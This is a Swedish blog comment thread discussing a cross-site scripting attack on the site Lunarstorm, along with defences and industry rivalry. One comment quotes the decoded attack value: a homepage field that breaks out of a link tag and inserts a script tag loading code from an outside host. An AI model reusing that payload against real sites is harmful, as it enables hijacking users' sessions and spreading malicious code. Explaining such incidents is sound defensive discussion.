Du kunde gjort det lite snyggare när du skapar en XMLHttpRequest men annars måste jag säga att det ser snyggt ut.

Hur lång tid tog det från idé till utförande?

Mvh Waldemar

Om du tittar i koden, under funktionen function injectscript() så ser du på femte raden där pd får ett värde tilldelat att variabeln “txtHomepage” (den återfinns i slutet på raden ovanför) sätts till ett värde som bland annat innehåller “www.hamsterpaj.net” och sedan bitvis en hel del konstiga kombinationer med % i början av dem. Detta är alltså URL-kodade tecken. Kör man hela den strängen genom en funktion som gör om dem till vanliga tecken får man fram raden: “www.hamsterpaj.net/forum/hamsterpaj/allmaent_om_hamsterpaj/foersvarstal_foer_forumet/”><script /src=http://koppiem.awardspace.com/script.js></script><a”

I strängen ingår alltså tecken som får själva länk-taggen att avslutas och att en komplett script-tag läggs in.

Hoppas att detta bidrog med lite ljus till situationen =)

Men någon som vet exakt vad som brast i säkerheten? Ola skriver om att det var fel på deras länkningsskript, men hur kunde det möjliggöra att man kunde köra javascript från en extern url?

På min blogg fick jag ett tips om att skriptet eventuellt kördes här ifrån: http://pastebin.com/m439d0918 Nån som kan bekräfta det?

Ägaren till Hamsterpaj har uttryckt att han gärna skulle se att Lunarstorm går i konkurs ja. Jag tror inte att så många företag skulle bli ledsna om de ser sin största konkurrent försvinna. Så det finns, enligt mig, inget särskilt anmärkningsvärt i uttalandet i sig. Däremot kan man kanske anse att det var lite klumpigt formulerat.

Att säga att det alltid finns kryphål är fel, däremot kan man säga att risken för att det finns någon form av kryphål är ganska stor. Det här hålet är däremot av en oerhört låg nivå. Det ska helt enkelt inte finnas på en så stor sida som Lunarstorm är.

Att det här har med någon sorts “svensk avundsjuka” är nog däremot ett felaktigt antagande

Det är möjligt att jag skriver en mer ingående artikel om XSS-attacker framöver däremot, då det fortfarande är ett mycket vanligt attacksätt.

Alla säkerhetshål beror på den mänskliga faktorn. Någonstans är det nämligen en människa som har lyckats förbise kontruktionsmissen.

Att lösa det hela är lätt: Lita inte på användaren, kontrollera deras inmatning.

Som du vet så är det förhållandevis vanligt med säkerhetshål. Kolla bara på masken som spred sig på Myspace. Den siten om någon borde ju ha riktiga rutiner för att det inte skall finnas några säkerhetsluckor. Men ändå hände det, och jag gissar på att svaret på varför det hände är den mänskliga faktorn. Det är människan som gör fel.

Jag har själv skrivit en hel del kod för webben på min fritid. Jag driver en liten site som har en del användare och besökare. Och jag vet själv hur lätt det kan vara att råka missa en sådan här sak. Nu är det väl skillnad om man sitter på fritiden och arbetar med det. Men i vilket fall som helst är det rätt lätt hänt att man råkar missa en sak.

Men du har rätt, det borde inte förekomma. Sedan hur man skall lösa det så att det absolut inte förekommer är ju en annan fråga. Jag skulle kunna gissa på att det oftast rör sig om ekonomi, att företaget inte vill lägga mer pengar på det.

Attacker av den typen som Lunarstorm i natt blev utsatt för är något av det första man ser till att skydda sig mot i samma stund som man tillåter användare att mata in värden.

Någonstans har det med andra ord brustit i deras säkerhetskontroller, vilket i förlängningen innebär just att säkerheten blir lägre. När sådana missar görs på etablerade och stora sidor är det så klart uppseendeväckande (åtminstone i mina ögon).

Tack för din synpunkt